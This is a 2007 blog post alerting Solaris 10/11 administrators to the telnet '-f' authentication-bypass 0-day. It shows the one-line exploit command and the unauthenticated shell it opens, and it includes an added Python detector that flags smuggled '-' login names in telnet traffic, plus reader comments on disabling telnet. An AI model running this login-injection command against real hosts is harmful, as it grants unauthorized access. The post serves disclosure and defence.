02.11.07

One more reason not to run telnet or Solaris 0-day == Trouble

Posted in Exploits, IT, Security, Vulnerabilities at 3:24 am by Tyler Reguly

We've all heard it before... Don't run telnet because it's a plain text protocol, it's an inherent security risk... Which is true; SSH just makes more sense, and plenty of people are using SSH these days. That doesn't mean everyone is, though, so... **ATTENTION SOLARIS ADMINS** If you're still running telnet on Solaris 10 or 11 (SunOS 5.10 or 5.11)... Turn it off. An email was released on Full Disclosure earlier with a new 0-day for Solaris 10/11 that's so easy it makes my skin crawl. A PDF linked in the email gives details and a small shell script to perform the exploit. It seemed surprising that this existed and had not been previously found, so of course I had to try it out.

C:\Documents and Settings\treguly>telnet -l "-fbin" X.X.X.X

Last login: Sun Feb 11 00:24:44 from XXXX
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$

The result is more than a little frightening...

A Hat Tip for this goes to Maynor and the Errata Security Blog for informing me of this issue.

[UPDATE] While it was initially rumoured that this didn't affect the root account, this is not the case... root logins are possible... it is dependent on configuration. More info on the nCircle Blog.
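
A defender-side check for the login shown above, as an added example that is not part of the original post: it scans a captured client-to-server telnet byte stream for a login name that begins with "-". It assumes the client carries the -l value in the NEW-ENVIRON USER variable (RFC 1572); the function names and the sample bytes are constructed for illustration.

```python
# Telnet command and NEW-ENVIRON codes (RFC 854, RFC 1572).
IAC, SB, SE, NEW_ENVIRON, IS, INFO = 255, 250, 240, 39, 0, 2
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3

def subnegotiations(stream):
    """Yield (option, payload) for every complete IAC SB <option> ... IAC SE block."""
    i, n = 0, len(stream)
    while i + 1 < n:
        if stream[i] != IAC:
            i += 1
        elif stream[i + 1] != SB:
            # IAC IAC is an escaped data byte; WILL/WONT/DO/DONT (251-254) carry an option.
            i += 3 if 251 <= stream[i + 1] <= 254 else 2
        else:
            end = i + 3
            while end + 1 < n and not (stream[end] == IAC and stream[end + 1] == SE):
                end += 2 if stream[end] == IAC else 1
            if end + 1 < n:
                yield stream[i + 2], stream[i + 3:end].replace(bytes([IAC, IAC]), bytes([IAC]))
            i = end + 2

def environ_vars(payload):
    """Decode a NEW-ENVIRON IS/INFO payload into {name: value}."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    tokens, i = [], 1
    while i < len(payload):
        b = payload[i]
        if b in (VAR, VALUE, USERVAR):
            tokens.append((b, bytearray()))
        elif tokens:
            if b == ESC and i + 1 < len(payload):
                i, b = i + 1, payload[i + 1]  # ESC makes the next byte literal
            tokens[-1][1].append(b)
        i += 1
    out, name = {}, None
    for kind, data in tokens:
        if kind != VALUE:
            name = data.decode("latin-1")
        elif name is not None:
            out[name] = data.decode("latin-1")
    return out

def suspicious_logins(stream):
    """Return USER values starting with '-', which login would parse as an option."""
    return [user for opt, payload in subnegotiations(stream) if opt == NEW_ENVIRON
            for user in [environ_vars(payload).get("USER", "")] if user.startswith("-")]
# Constructed sample: IAC WILL TERMINAL-TYPE, then NEW-ENVIRON IS VAR "USER" VALUE "-fbin".
SAMPLE = bytes([IAC, 251, 24, IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER\x01-fbin" + bytes([IAC, SE])
```

Running `suspicious_logins(SAMPLE)` flags the constructed "-fbin" login, while an ordinary user name in the same option produces no hit.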


5 Comments »

  1. johnm said,

    February 14, 2007 at 6:35 am

    hi there,

    I have a SunOS 5.10 box at my work. I'm a real newbie in SunOS so I really need your help … can you please tell me how to close telnet or if there is a patch for this vuln.

    thx

  2. Tyler Reguly said,

    February 14, 2007 at 4:55 pm

    You can disable telnet with the command: svcadm disable telnet

    There was an interim patch available from Sun, but when I pull the page up now it seems to be gone; perhaps they’ve issued a full patch, but I’m not sure where it is located.

  3. johnm said,

    February 15, 2007 at 6:50 am

    thx a lot. If you find the patch pls paste the link here, thanks

  4. johnm said,

    February 15, 2007 at 6:54 am

    COIS# svcadm disable telnet
    svcadm: not found
    COIS#

  5. The Current Truth said,

    March 23, 2007 at 10:36 pm

    [...] Here are some insightful posts and verification of the various capabilities of the exploit. Errata Security Computer Defense [...]
